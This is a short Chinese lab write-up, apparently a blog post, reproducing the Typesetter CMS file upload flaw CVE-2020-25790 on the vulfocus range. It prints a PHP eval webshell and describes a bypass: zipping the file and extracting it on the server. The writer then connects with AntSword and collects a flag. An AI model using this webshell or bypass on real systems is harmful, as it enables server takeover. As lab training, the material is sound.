vulfocus-typesetter 文件上传(CVE-2020-25790)

vulfocus-typesetter 文件上传(CVE-2020-25790)

从web端进入CMS,点击已上传的档案页面
vulfocus-typesetter 文件上传(CVE-2020-25790)_第1张图片

准备test.php文件,文件内容如下

 @eval($_POST['cmd']);?>//一句话木马,$_POST的值是webshell密码

将test.php上传到该页面,出现报错,报错内容是permission denied.
vulfocus-typesetter 文件上传(CVE-2020-25790)_第2张图片

将test.php压缩成zip文件,再次上传
vulfocus-typesetter 文件上传(CVE-2020-25790)_第3张图片

上传成功,解压test.zip文件
vulfocus-typesetter 文件上传(CVE-2020-25790)_第4张图片

test.php文件解压成功
vulfocus-typesetter 文件上传(CVE-2020-25790)_第5张图片
获取test.php目录,利用中国蚁剑连接

vulfocus-typesetter 文件上传(CVE-2020-25790)_第6张图片

点击测试连接,出现连接成功后保存

vulfocus-typesetter 文件上传(CVE-2020-25790)_第7张图片

成功进入到目录下
vulfocus-typesetter 文件上传(CVE-2020-25790)_第8张图片

在/tmp中获取到flag

vulfocus-typesetter 文件上传(CVE-2020-25790)_第9张图片

原理

该CMS只检测上传的文件是否是危险文件,而不是检测文件的内容,理应来说不仅要检测文件的后缀名,还要检测文件内容是否带有危险参数,如果遇上加密的zip文件,可以禁止上传到该目录下

其他漏洞复现则会更新在vulfocus复现

你可能感兴趣的:(vulfocus靶场训练,web安全,安全)